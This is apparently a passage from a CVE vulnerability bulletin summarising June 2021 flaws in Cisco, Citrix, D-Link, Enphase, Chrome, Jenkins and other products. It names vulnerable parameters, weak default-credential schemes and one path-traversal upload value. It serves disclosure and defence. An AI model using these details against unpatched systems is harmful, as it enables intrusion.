A vulnerability in Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to cause a denial of service (DoS) condition on an affected system. This vulnerability is due to uncontrolled memory allocation. An attacker could exploit this vulnerability by copying a crafted file to a specific folder on the system. A successful exploit could allow the attacker to crash the VPN Agent service when the affected application is launched, causing it to be unavailable to all users of the system. To exploit this vulnerability, the attacker must have valid credentials on a multiuser Windows system. 2021-06-16 not yet calculated CVE-2021-1568
CISCO
cisco — jabber
 
Multiple vulnerabilities in Cisco Jabber for Windows, Cisco Jabber for Mac, and Cisco Jabber for mobile platforms could allow an attacker to access sensitive information or cause a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1570
CISCO
cisco — jabber
 
Multiple vulnerabilities in Cisco Jabber for Windows, Cisco Jabber for Mac, and Cisco Jabber for mobile platforms could allow an attacker to access sensitive information or cause a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1569
CISCO
cisco — meeting_server
 
A vulnerability in the API of Cisco Meeting Server could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability exists because requests that are sent to the API are not properly validated. An attacker could exploit this vulnerability by sending a malicious request to the API. A successful exploit could allow the attacker to cause all participants on a call to be disconnected, resulting in a DoS condition. 2021-06-16 not yet calculated CVE-2021-1524
CISCO
cisco — small_business_220_series_smart_switches
 
Multiple vulnerabilities in the web-based management interface of Cisco Small Business 220 Series Smart Switches could allow an attacker to do the following: Hijack a user session Execute arbitrary commands as a root user on the underlying operating system Conduct a cross-site scripting (XSS) attack Conduct an HTML injection attack For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1543
CISCO
cisco — small_business_220_series_smart_switches
 
Multiple vulnerabilities in the web-based management interface of Cisco Small Business 220 Series Smart Switches could allow an attacker to do the following: Hijack a user session Execute arbitrary commands as a root user on the underlying operating system Conduct a cross-site scripting (XSS) attack Conduct an HTML injection attack For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1542
CISCO
cisco — small_business_220_series_smart_switches
 
Multiple vulnerabilities in the web-based management interface of Cisco Small Business 220 Series Smart Switches could allow an attacker to do the following: Hijack a user session Execute arbitrary commands as a root user on the underlying operating system Conduct a cross-site scripting (XSS) attack Conduct an HTML injection attack For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1571
CISCO
cisco — small_business_220_series_smart_switches
 
Multiple vulnerabilities in the web-based management interface of Cisco Small Business 220 Series Smart Switches could allow an attacker to do the following: Hijack a user session Execute arbitrary commands as a root user on the underlying operating system Conduct a cross-site scripting (XSS) attack Conduct an HTML injection attack For more information about these vulnerabilities, see the Details section of this advisory. 2021-06-16 not yet calculated CVE-2021-1541
CISCO
cisco — unified_intelligence_center
 
A vulnerability in the web-based management interface of Cisco Unified Intelligence Center could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2021-06-16 not yet calculated CVE-2021-1395
CISCO
citrix — adc_and_netscaler_gateway
 
Citrix ADC and Citrix/NetScaler Gateway 13.0 before 13.0-76.29, 12.1-61.18, 11.1-65.20, Citrix ADC 12.1-FIPS before 12.1-55.238, and Citrix SD-WAN WANOP Edition before 11.4.0, 11.3.2, 11.3.1a, 11.2.3a, 11.1.2c, 10.2.9a suffers from uncontrolled resource consumption by way of a network-based denial-of-service from within the same Layer 2 network segment. Note that the attacker must be in the same Layer 2 network segment as the vulnerable appliance. 2021-06-16 not yet calculated CVE-2020-8299
MISC
citrix — adc_and_netscaler_gateway
 
Citrix ADC and Citrix/NetScaler Gateway before 13.0-82.41, 12.1-62.23, 11.1-65.20 and Citrix ADC 12.1-FIPS before 12.1-55.238 suffer from improper access control allowing SAML authentication hijack through a phishing attack to steal a valid user session. Note that Citrix ADC or Citrix Gateway must be configured as a SAML SP or a SAML IdP for this to be possible. 2021-06-16 not yet calculated CVE-2020-8300
MISC
citrix — cloud_connector
 
Citrix Cloud Connector before 6.31.0.62192 suffers from insecure storage of sensitive information due to sensitive information being stored in the Citrix Cloud Connector installation log files. Such information could be used by an malicious actor to access a Citrix Cloud environment. This issue affects all versions of Citrix Cloud Connector that were installed by passing secure client parameters for installation via the command line. The issue does not affect Citrix Cloud Connector if it was installed using the interactive installer or where a parameter file was used with the command-line installer. 2021-06-16 not yet calculated CVE-2021-22914
MISC
civicrm — civicrm
 
In CiviCRM before 5.21.3 and 5.22.x through 5.24.x before 5.24.3, users may be able to upload and execute a crafted PHAR archive. 2021-06-17 not yet calculated CVE-2020-36388
MISC
civicrm — civicrm
 
In CiviCRM before 5.28.1 and CiviCRM ESR before 5.27.5 ESR, the CKEditor configuration form allows CSRF. 2021-06-17 not yet calculated CVE-2020-36389
MISC
cleo — lexicom
 
An issue was discovered in Cleo LexiCom 5.5.0.0. The requirement for the sender of an AS2 message to identify themselves (via encryption and signing of the message) can be bypassed by changing the Content-Type of the message to text/plain. 2021-06-18 not yet calculated CVE-2021-33577
MISC
MISC
cleo — lexicom
 
An issue was discovered in Cleo LexiCom 5.5.0.0. Within the AS2 message, the sender can specify a filename. This filename can include path-traversal characters, allowing the file to be written to an arbitrary location on disk. 2021-06-18 not yet calculated CVE-2021-33576
MISC
MISC
connectwise — automate
 
An issue was discovered in ConnectWise Automate before 2021.5. A blind SQL injection vulnerability exists in core agent inventory communication that can enable an attacker to extract database information or administrative credentials from an instance via crafted monitor status responses. 2021-06-17 not yet calculated CVE-2021-32582
MISC
MISC
MISC
contiki-ng — contiki-ng Contiki-NG is an open-source, cross-platform operating system for internet of things devices. A buffer overflow vulnerability exists in Contiki-NG versions prior to 4.6. After establishing a TCP socket using the tcp-socket library, it is possible for the remote end to send a packet with a data offset that is unvalidated. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21281
MISC
CONFIRM
contiki-ng — contiki-ng Contiki-NG is an open-source, cross-platform operating system for internet of things devices. In versions prior to 4.5, buffer overflow can be triggered by an input packet when using either of Contiki-NG’s two RPL implementations in source-routing mode. The problem has been patched in Contiki-NG 4.5. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21282
MISC
CONFIRM
contiki-ng — contiki-ng
 
Contiki-NG is an open-source, cross-platform operating system for internet of things devices. It is possible to cause an out-of-bounds write in versions of Contiki-NG prior to 4.6 when transmitting a 6LoWPAN packet with a chain of extension headers. Unfortunately, the written header is not checked to be within the available space, thereby making it possible to write outside the buffer. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21280
MISC
CONFIRM
contiki-ng — contiki-ng
 
Contiki-NG is an open-source, cross-platform operating system for internet of things devices. In verions prior to 4.6, an attacker can perform a denial-of-service attack by triggering an infinite loop in the processing of IPv6 neighbor solicitation (NS) messages. This type of attack can effectively shut down the operation of the system because of the cooperative scheduling used for the main parts of Contiki-NG and its communication stack. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21279
CONFIRM
contiki-ng — contiki-ng
 
Contiki-NG is an open-source, cross-platform operating system for internet of things devices. The RPL-Classic and RPL-Lite implementations in the Contiki-NG operating system versions prior to 4.6 do not validate the address pointer in the RPL source routing header This makes it possible for an attacker to cause out-of-bounds writes with packets injected into the network stack. Specifically, the problem lies in the rpl_ext_header_srh_update function in the two rpl-ext-header.c modules for RPL-Classic and RPL-Lite respectively. The addr_ptr variable is calculated using an unvalidated CMPR field value from the source routing header. An out-of-bounds write can be triggered on line 151 in os/net/routing/rpl-lite/rpl-ext-header.c and line 261 in os/net/routing/rpl-classic/rpl-ext-header.c, which contain the following memcpy call with addr_ptr as destination. The problem has been patched in Contiki-NG 4.6. Users can apply a patch out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21257
MISC
CONFIRM
contiki-ng — contiki-ng
 
Contiki-NG is an open-source, cross-platform operating system for Next-Generation IoT devices. An out-of-bounds read can be triggered by 6LoWPAN packets sent to devices running Contiki-NG 4.6 and prior. The IPv6 header decompression function (<code>uncompress_hdr_iphc</code>) does not perform proper boundary checks when reading from the packet buffer. Hence, it is possible to construct a compressed 6LoWPAN packet that will read more bytes than what is available from the packet buffer. As of time of publication, there is not a release with a patch available. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 not yet calculated CVE-2021-21410
CONFIRM
MISC
curl — curl
 
curl 7.7 through 7.76.1 suffers from an information disclosure when the `-t` command line option, known as `CURLOPT_TELNETOPTIONS` in libcurl, is used to send variable=content pairs to TELNET servers. Due to a flaw in the option parser for sending NEW_ENV variables, libcurl could be made to pass on uninitialized data from a stack based buffer to the server, resulting in potentially revealing sensitive internal information to the server using a clear-text network protocol. 2021-06-11 not yet calculated CVE-2021-22898
MISC
MISC
MISC
MLIST
d-link — dir-2640-us D-Link DIR-2640-US 1.01B04 is vulnerable to Buffer Overflow. There are multiple out-of-bounds vulnerabilities in some processes of D-Link AC2600(DIR-2640). Local ordinary users can overwrite the global variables in the .bss section, causing the process crashes or changes. 2021-06-16 not yet calculated CVE-2021-34201
MISC
MISC
MISC
MISC
d-link — dir-2640-us
 
D-Link DIR-2640-US 1.01B04 is vulnerable to Incorrect Access Control. Router ac2600 (dir-2640-us), when setting PPPoE, will start quagga process in the way of whole network monitoring, and this function uses the original default password and port. An attacker can easily use telnet to log in, modify routing information, monitor the traffic of all devices under the router, hijack DNS and phishing attacks. In addition, this interface is likely to be questioned by customers as a backdoor, because the interface should not be exposed. 2021-06-16 not yet calculated CVE-2021-34203
MISC
MISC
MISC
MISC
d-link — dir-2640-us
 
There are multiple out-of-bounds vulnerabilities in some processes of D-Link AC2600(DIR-2640) 1.01B04. Ordinary permissions can be elevated to administrator permissions, resulting in local arbitrary code execution. An attacker can combine other vulnerabilities to further achieve the purpose of remote code execution. 2021-06-16 not yet calculated CVE-2021-34202
MISC
MISC
MISC
MISC
d-link — dir-2640-us
 
D-Link DIR-2640-US 1.01B04 is affected by Insufficiently Protected Credentials. D-Link AC2600(DIR-2640) stores the device system account password in plain text. It does not use linux user management. In addition, the passwords of all devices are the same, and they cannot be modified by normal users. An attacker can easily log in to the target router through the serial port and obtain root privileges. 2021-06-16 not yet calculated CVE-2021-34204
MISC
MISC
MISC
MISC
db2 — db2
 
Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1.4 and 11.5.5 is vulnerable to a denial of service as the server terminates abnormally when executing a specially crafted SELECT statement. IBM X-Force ID: 200658. 2021-06-16 not yet calculated CVE-2021-29702
XF
CONFIRM
dedecms — dedecms
 
SQL Injection vulnerability in DedeCMS 5.7 via mdescription parameter to member/ajax_membergroup.php. 2021-06-16 not yet calculated CVE-2020-22198
MISC
MISC
dell — poweredge Dell PowerEdge R640, R740, R740XD, R840, R940, R940xa, MX740c, MX840c, and T640 Server BIOS contain a stack-based buffer overflow vulnerability in systems with NVDIMM-N installed. A local malicious user with high privileges may potentially exploit this vulnerability, leading to a denial of Service, arbitrary code execution, or information disclosure in UEFI or BIOS Preboot Environment. 2021-06-14 not yet calculated CVE-2021-21556
CONFIRM
dell — poweredge Dell PowerEdge R640, R740, R740XD, R840, R940, R940xa, MX740c, MX840c, and T640 Server BIOS contain a heap-based buffer overflow vulnerability in systems with NVDIMM-N installed. A local malicious user with high privileges may potentially exploit this vulnerability, leading to a denial of Service, arbitrary code execution, or information disclosure in UEFI or BIOS Preboot Environment. 2021-06-14 not yet calculated CVE-2021-21555
CONFIRM
dell — poweredge
 
Dell PowerEdge R640, R740, R740XD, R840, R940, R940xa, MX740c, MX840c, and, Dell Precision 7920 Rack Workstation BIOS contain a stack-based buffer overflow vulnerability in systems with Intel Optane DC Persistent Memory installed. A local malicious user with high privileges may potentially exploit this vulnerability, leading to a denial of Service, arbitrary code execution, or information disclosure in UEFI or BIOS Preboot Environment. 2021-06-14 not yet calculated CVE-2021-21554
CONFIRM
dell — poweredge_server_bios_andPrecision_rack_bios
 
Dell PowerEdge Server BIOS and select Dell Precision Rack BIOS contain an out-of-bounds array access vulnerability. A local malicious user with high privileges may potentially exploit this vulnerability, leading to a denial of service, arbitrary code execution, or information disclosure in System Management Mode. 2021-06-14 not yet calculated CVE-2021-21557
CONFIRM
ecshop — ecshop SQL Injection in ECShop 3.0 via the id parameter to admin/shophelp.php. 2021-06-16 not yet calculated CVE-2020-22205
MISC
ecshop — ecshop SQL Injection in ECShop 3.0 via the aid parameter to admin/affiliate_ck.php. 2021-06-16 not yet calculated CVE-2020-22206
MISC
ecshop — ecshop
 
SQL Injection in ECShop 2.7.6 via the goods_number parameter to flow.php. . 2021-06-16 not yet calculated CVE-2020-22204
MISC
eip — stack_group_opener
 
An information disclosure vulnerability exists in the Ethernet/IP UDP handler functionality of EIP Stack Group OpENer 2.3 and development commit 8c73bf3. A specially crafted network request can lead to an out-of-bounds read. 2021-06-17 not yet calculated CVE-2021-21777
MISC
elemin — elemin
 
Elemin allows remote attackers to upload and execute arbitrary PHP code via the Themify framework (before 1.2.2) wp-content/themes/elemin/themify/themify-ajax.php file. 2021-06-17 not yet calculated CVE-2013-20002
MISC
MISC
MISC
MISC
elfinder — elfinder
 
elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication. 2021-06-14 not yet calculated CVE-2021-32682
MISC
CONFIRM
enphase — envoy An issue was discovered on Enphase Envoy R3.x and D4.x devices. There is a custom PAM module for user authentication that circumvents traditional user authentication. This module uses a password derived from the MD5 hash of the username and serial number. The serial number can be retrieved by an unauthenticated user at /info.xml. Attempts to change the user password via passwd or other tools have no effect. 2021-06-16 not yet calculated CVE-2020-25754
MISC
MISC
MISC
enphase — envoy
 
An issue was discovered on Enphase Envoy R3.x and D4.x devices with v3 software. The default admin password is set to the last 6 digits of the serial number. The serial number can be retrieved by an unauthenticated user at /info.xml. 2021-06-16 not yet calculated CVE-2020-25753
MISC
MISC
MISC
enphase — envoy
 
An issue was discovered on Enphase Envoy R3.x and D4.x devices. There are hardcoded web-panel login passwords for the installer and Enphase accounts. The passwords for these accounts are hardcoded values derived from the MD5 hash of the username and serial number mixed with some static strings. The serial number can be retrieved by an unauthenticated user at /info.xml. These passwords can be easily calculated by an attacker; users are unable to change these passwords. 2021-06-16 not yet calculated CVE-2020-25752
MISC
MISC
MISC
enphase — envoy
 
An issue was discovered on Enphase Envoy R3.x and D4.x (and other current) devices. The upgrade_start function in /installer/upgrade_start allows remote authenticated users to execute arbitrary commands via the force parameter. 2021-06-16 not yet calculated CVE-2020-25755
MISC
MISC
MISC
excellent_infotek_corporation — e-document_system
 
An issue was discovered in EXCELLENT INFOTEK CORPORATION (EIC) E-document System 3.0. A remote attacker can use kw/auth/bbs/asp/get_user_email_info_bbs.asp to obtain the contact information (name and e-mail address) of everyone in the entire organization. This information can allow remote attackers to perform social engineering or brute force attacks against the system login page. 2021-06-16 not yet calculated CVE-2021-34683
MISC
MISC
fiyo — cms
 
In Fiyo CMS 2.0.6.1, the ‘tag’ parameter results in an unauthenticated XSS attack. 2021-06-17 not yet calculated CVE-2020-35373
MISC
fogproject — fogproject
 
FOGProject v1.5.9 is affected by a File Upload RCE (Authenticated). 2021-06-16 not yet calculated CVE-2021-32243
MISC
foxit — phantompdf
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.1.3.37598. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XFA templates. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13531. 2021-06-16 not yet calculated CVE-2021-31476
MISC
MISC
ge — reason_rpv311
 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of GE Reason RPV311 14A03. Authentication is not required to exploit this vulnerability. The specific flaw exists within the firmware and filesystem of the device. The firmware and filesystem contain hard-coded default credentials. An attacker can leverage this vulnerability to execute code in the context of the download user. Was ZDI-CAN-11852. 2021-06-16 not yet calculated CVE-2021-31477
MISC
MISC
google — android
 
In Chromecast bootROM, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege in the bootloader, with physical USB access, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-174490700 2021-06-14 not yet calculated CVE-2021-0467
MISC
google — android
 
Product: AndroidVersions: Android SoCAndroid ID: A-175402462 2021-06-14 not yet calculated CVE-2021-0324
MISC
google — chrome
 
Use after free in Autofill in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 not yet calculated CVE-2021-30546
MISC
MISC
google — chrome
 
Use after free in BFCache in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 not yet calculated CVE-2021-30544
MISC
MISC
google — chrome
 
Use after free in Extensions in Google Chrome prior to 91.0.4472.101 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 not yet calculated CVE-2021-30545
MISC
MISC
google — chrome
 
Use after free in Accessibility in Google Chrome prior to 91.0.4472.101 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 not yet calculated CVE-2021-30550
MISC
MISC
hasicorp — nomad_and_nomad_enterprise
 
HashiCorp Nomad and Nomad Enterprise up to version 1.0.4 bridge networking mode allows ARP spoofing from other bridged tasks on the same node. Fixed in 0.12.12, 1.0.5, and 1.1.0 RC1. 2021-06-17 not yet calculated CVE-2021-32575
MISC
MISC
helm — helm
 
Helm is a tool for managing Charts (packages of pre-configured Kubernetes resources). In versions of helm prior to 3.6.1, a vulnerability exists where the username and password credentials associated with a Helm repository could be passed on to another domain referenced by that Helm repository. This issue has been resolved in 3.6.1. There is a workaround through which one may check for improperly passed credentials. One may use a username and password for a Helm repository and may audit the Helm repository in order to check for another domain being used that could have received the credentials. In the `index.yaml` file for that repository, one may look for another domain in the `urls` list for the chart versions. If there is another domain found and that chart version was pulled or installed, the credentials would be passed on. 2021-06-16 not yet calculated CVE-2021-32690
MISC
CONFIRM
hitachi — abb_power_grids_ellipse Cross-site Scripting (XSS) vulnerability in the main dashboard of Ellipse APM versions allows an authenticated user or integrated application to inject malicious data into the application that can then be executed in a victim’s browser. This issue affects: Hitachi ABB Power Grids Ellipse APM 5.3 version 5.3.0.1 and prior versions; 5.2 version 5.2.0.3 and prior versions; 5.1 version 5.1.0.6 and prior versions. 2021-06-14 not yet calculated CVE-2021-27887
CONFIRM
hitachi — abb_power_grids_esoms
 
Information Exposure vulnerability in Hitachi ABB Power Grids eSOMS allows unauthorized user to gain access to report data if the URL used to access the report is discovered. This issue affects: Hitachi ABB Power Grids eSOMS 6.0 versions prior to 6.0.4.2.2; 6.1 versions prior to 6.1.4; 6.3 versions prior to 6.3. 2021-06-14 not yet calculated CVE-2021-26845
CONFIRM
hitachi — multiple_products
 
Improper Input Validation vulnerability in Hitachi ABB Power Grids Relion 670 Series, Relion 670/650 Series, Relion 670/650/SAM600-IO, Relion 650, REB500, RTU500 Series, FOX615 (TEGO1), MSM, GMS600, PWC600 allows an attacker with access to the IEC 61850 network with knowledge of how to reproduce the attack, as well as the IP addresses of the different IEC 61850 access points (of IEDs/products), to force the device to reboot, which renders the device inoperable for approximately 60 seconds. This vulnerability affects only products with IEC 61850 interfaces. This issue affects: Hitachi ABB Power Grids Relion 670 Series 1.1; 1.2.3 versions prior to 1.2.3.20; 2.0 versions prior to 2.0.0.13; 2.1; 2.2.2 versions prior to 2.2.2.3; 2.2.3 versions prior to 2.2.3.2. Hitachi ABB Power Grids Relion 670/650 Series 2.2.0 versions prior to 2.2.0.13. Hitachi ABB Power Grids Relion 670/650/SAM600-IO 2.2.1 versions prior to 2.2.1.6. Hitachi ABB Power Grids Relion 650 1.1; 1.2; 1.3 versions prior to 1.3.0.7. Hitachi ABB Power Grids REB500 7.3; 7.4; 7.5; 7.6; 8.2; 8.3. Hitachi ABB Power Grids RTU500 Series 7.x version 7.x and prior versions; 8.x version 8.x and prior versions; 9.x version 9.x and prior versions; 10.x version 10.x and prior versions; 11.x version 11.x and prior versions; 12.x version 12.x and prior versions. Hitachi ABB Power Grids FOX615 (TEGO1) R1D02 version R1D02 and prior versions. Hitachi ABB Power Grids MSM 2.1.0 versions prior to 2.1.0. Hitachi ABB Power Grids GMS600 1.3.0 version 1.3.0 and prior versions. Hitachi ABB Power Grids PWC600 1.0 versions prior to 1.0.1.4; 1.1 versions prior to 1.1.0.1. 2021-06-14 not yet calculated CVE-2021-27196
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
ibm — aix IBM AIX 7.1 could allow a non-privileged local user to exploit a vulnerability in the trace facility to expose sensitive information or cause a denial of service. IBM X-Force ID: 200663. 2021-06-17 not yet calculated CVE-2021-29706
XF
CONFIRM
ibm — financial_transaction_manager
 
IBM Financial Transaction Manager 3.0.2 and 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 192952. 2021-06-15 not yet calculated CVE-2020-5000
XF
CONFIRM
ibm — resilient_soar
 
IBM Resilient SOAR V38.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 199238. 2021-06-16 not yet calculated CVE-2021-20566
CONFIRM
XF
ibm — resilient_soar
 
IBM Resilient SOAR V38.0 could allow a local privileged attacker to obtain sensitive information due to improper or nonexisting encryption.IBM X-Force ID: 199239. 2021-06-16 not yet calculated CVE-2021-20567
CONFIRM
XF
ibm — security_identity_manager IBM Security Identity Manager 6.0.2 could allow an authenticated malicious user to change the passwords of other users in the Windows AD environment when IBM Security Identity Manager Windows Password Synch Plug-in is deployed and configured. IBM X-Force ID: 197789. 2021-06-16 not yet calculated CVE-2021-20488
XF
CONFIRM
ibm — security_identity_manager
 
IBM Security Identity Manager 6.0.2 is vulnerable to server-side request forgery (SSRF). By sending a specially crafted request, a remote authenticated attacker could exploit this vulnerability to obtain sensitive data. IBM X-Force ID: 197591. 2021-06-16 not yet calculated CVE-2021-20483
XF
CONFIRM
insyde — insydeh2o An issue was discovered in IdeBusDxe in Insyde InsydeH2O 5.x. Code in system management mode calls a function outside of SMRAM in response to a crafted software SMI, aka Inclusion of Functionality from an Untrusted Control Sphere. Modifying the well-known address of this function allows an attacker to gain control of the system with the privileges of system management mode. 2021-06-16 not yet calculated CVE-2020-27339
MISC
MISC
intel — brand_verification_tool
 
Improper permissions in the installer for the Intel(R) Brand Verification Tool before version 11.0.0.1225 may allow an authenticated user to potentially enable escalation of privilege via local access. 2021-06-17 not yet calculated CVE-2021-0143
MISC
jact — openclinic
 
Jact OpenClinic 0.8.20160412 allows the attacker to read server files after login to the the admin account by an infected ‘file’ GET parameter in ‘/shared/view_source.php’ which “could” lead to RCE vulnerability . 2021-06-16 not yet calculated CVE-2020-20444
CONFIRM
jdom — saxbuilder
 
An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request. 2021-06-16 not yet calculated CVE-2021-33813
MISC
MISC
MISC
jenkins — generic_webhook_trigger_plugin
 
Jenkins Generic Webhook Trigger Plugin 1.72 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 2021-06-18 not yet calculated CVE-2021-21669
CONFIRM
MLIST
jenkins — scriptler Jenkins Scriptler Plugin 3.2 and earlier does not escape parameter names shown in job configuration forms, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Scriptler/Configure permission. 2021-06-16 not yet calculated CVE-2021-21667
CONFIRM
MLIST
jenkins — scriptler
 
Jenkins Scriptler Plugin 3.1 and earlier does not escape script content, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Scriptler/Configure permission. 2021-06-16 not yet calculated CVE-2021-21668
CONFIRM
MLIST
jpress — jpress
 
An issue was discovered in JPress v3.3.0 and below. There are XSS vulnerabilities in the template module and tag management module. If you log in to the background by means of weak password, the storage XSS vulnerability can occur. 2021-06-18 not yet calculated CVE-2021-33347
MISC
MISC
kuaifancms — kuaifancms
 
KuaiFanCMS V5.x contains an arbitrary file read vulnerability in the html_url parameter of the chakanhtml.module.php file. 2021-06-11 not yet calculated CVE-2021-3256
MISC
laiketui — laiketui

 

LaikeTui 3.5.0 allows remote authenticated users to delete arbitrary files, as demonstrated by deleting install.lock in order to reinstall the product in an attacker-controlled manner. This deletion is possible via directory traversal in the uploadImg, oldpic, or imgurl parameter. 2021-06-15 not yet calculated CVE-2021-34129
MISC
laiketui — laiketui
 
LaikeTui 3.5.0 allows remote authenticated users to execute arbitrary PHP code by using index.php?module=system&action=pay to upload a ZIP archive containing a .php file, as demonstrated by the ../../../../phpinfo.php pathname. 2021-06-15 not yet calculated CVE-2021-34128
MISC
linux — linux_kernel
 
net/can/bcm.c in the Linux kernel through 5.12.10 allows local users to obtain sensitive information from kernel stack memory because parts of a data structure are uninitialized. 2021-06-14 not yet calculated CVE-2021-34693
MISC
MLIST
linux — linux_kernel
 
An Out-of-Bounds Read was discovered in arch/arm/mach-footbridge/personal-pci.c in the Linux kernel through 5.12.11 because of the lack of a check for a value that shouldn’t be negative, e.g., access to element -2 of an array, aka CID-298a58e165e4. 2021-06-17 not yet calculated CVE-2021-32078
CONFIRM
CONFIRM
MISC
lutils — lutils
 
All versions of package lutils are vulnerable to Prototype Pollution via the main (merge) function. 2021-06-17 not yet calculated CVE-2021-23396
MISC
magento — magento
 
magento-scripts contains scripts and configuration used by Create Magento App, a zero-configuration tool-chain which allows one to deploy Magento 2. In versions 1.5.1 and 1.5.2, after changing the function from synchronous to asynchronous there wasn’t implemented handler in the start, stop, exec, and logs commands, effectively making them unusable. Version 1.5.3 contains patches for the problems. 2021-06-14 not yet calculated CVE-2021-32684
MISC
CONFIRM
mantisbt — mantisbt
 
An XSS issue was discovered in manage_custom_field_edit_page.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field. 2021-06-17 not yet calculated CVE-2021-33557
MISC
CONFIRM
matrix — appservice-bridge
 
Matrix-appservice-bridge is the bridging service for the Matrix communication program’s application services. In versions 2.6.0 and earlier, if a bridge has room upgrade handling turned on in the configuration (the `roomUpgradeOpts` key when instantiating a new `Bridge` instance.), any `m.room.tombstone` event it encounters will be used to unbridge the current room and bridge into the target room. However, the target room `m.room.create` event is not checked to verify if the `predecessor` field contains the previous room. This means that any malicious admin of a bridged room can repoint the traffic to a different room without the new room being aware. Versions 2.6.1 and greater are patched. As a workaround, disabling the automatic room upgrade handling can be done by removing the `roomUpgradeOpts` key from the `Bridge` class options. 2021-06-16 not yet calculated CVE-2021-32659
MISC
MISC
CONFIRM
matrix — libolm
 
Matrix libolm before 3.2.3 allows a malicious Matrix homeserver to crash a client (while it is attempting to retrieve an Olm encrypted room key backup from the homeserver) because olm_pk_decrypt has a stack-based buffer overflow. Remote code execution might be possible for some nonstandard build configurations. 2021-06-16 not yet calculated CVE-2021-34813
MISC
MISC
MISC
mcusystem — mcusystem
 
The login page in the MCUsystem does not filter with special characters, which allows remote attackers can inject JavaScript without privilege and thus perform reflected XSS attacks. 2021-06-18 not yet calculated CVE-2021-32536
MISC
monstra — monstra
 
A local file inclusion vulnerability was discovered in the captcha function in Monstra 3.0.4 which allows remote attackers to execute arbitrary PHP code. 2021-06-17 not yet calculated CVE-2020-25414
MISC
moodle — moodle
 
Cross Site Scripting (XSS) in Moodle 3.10.3 allows remote attackers to execute arbitrary web script or HTML via the “Description” field. 2021-06-16 not yet calculated CVE-2021-32244
MISC
moxa — mgate_mb3180
 
An issue was discovered on MOXA Mgate MB3180 Version 2.1 Build 18113012. Attacker could send a huge amount of TCP SYN packet to make web service’s resource exhausted. Then the web server is denial-of-service. 2021-06-18 not yet calculated CVE-2021-33823
MISC
MISC
moxa — mgate_mb3180
 
An issue was discovered on MOXA Mgate MB3180 Version 2.1 Build 18113012. Attackers can use slowhttptest tool to send incomplete HTTP request, which could make server keep waiting for the packet to finish the connection, until its resource exhausted. Then the web server is denial-of-service. 2021-06-18 not yet calculated CVE-2021-33824
MISC
MISC
MISC
nedb — nedb
 
This affects all versions of package nedb. The library could be tricked into adding or modifying properties of Object.prototype using a __proto__ or constructor.prototype payload. 2021-06-15 not yet calculated CVE-2021-23395
MISC
nextcloud — android_app
 
Nextcloud Android app is the Android client for Nextcloud. In versions prior to 3.15.1, a malicious application on the same device is possible to crash the Nextcloud Android Client due to an uncaught exception. The vulnerability is patched in version 3.15.1. 2021-06-17 not yet calculated CVE-2021-32694
CONFIRM
MISC
MISC
nextcloud — android_app
 
Nextcloud Android app is the Android client for Nextcloud. In versions prior to 3.16.1, a malicious app on the same device could have gotten access to the shared preferences of the Nextcloud Android application. This required user-interaction as a victim had to initiate the sharing flow and choose the malicious app. The shared preferences contain some limited private data such as push tokens and the account name. The vulnerability is patched in version 3.16.1. 2021-06-17 not yet calculated CVE-2021-32695
MISC
MISC
CONFIRM
nextcloud — talk
 
